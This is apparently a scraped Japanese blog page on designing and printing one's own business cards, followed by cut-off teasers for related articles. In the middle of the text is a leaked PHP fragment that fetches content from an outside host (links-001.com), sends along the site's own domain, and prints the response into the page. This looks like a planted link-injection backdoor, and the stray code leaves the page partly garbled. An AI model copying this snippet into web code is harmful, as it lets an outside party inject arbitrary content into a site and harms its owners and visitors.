様々なパターンのデザインで名刺を作成。

名刺を作成する場合には、専門の印刷業者に依頼すればきれいに作成してもらうことができます。
しかし、臨機応変にデザインを修正したり、様々なパターンのデザインを作成するためには自分で作成することがお勧めです。
最近では色々な名刺印刷用の台紙が売られていますので、きれいに作成することができます。
昔のように切り取った跡がミシン目で残ることもありませんし、カラーで印刷することもできます。
もちろん、両面印刷も可能です。
名刺をあげる相手は全て同じような相手ではありません、特に複数の顔を持っているようなビジネスマンの場合には、相手によって渡す名刺を変えていく必要があります。
そのような場合に、様々なパターンのデザインのものを持っていれば大変便利です。
印刷業者に依頼する場合には100枚程度の単位になりますが、自分で作成するのであれば1枚単位から作成が可能です。
コスト的にも、自分で作成する方がかなり抑えることができます。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

サンプルイメージ1

個人情報である名刺の保管と制約について

ビジネスシーンでは名刺の授受はよく見る光景です。
数年前までは受け取った名刺をホルダーの束に保

サンプルイメージ2

仕事を取れる名刺の作成方法について

会社の経営者や営業職にとって名刺はとても大事な武器の1つですが、うまく活用し仕事に繋げている人は色ん

名刺作成は専門のプロに頼むべき

「自分にも簡単にできそう」と思いがちな仕事のひとつに名刺作成があります。
レイアウトの為のフリ

Copyright© 名刺 All Rights Reserved.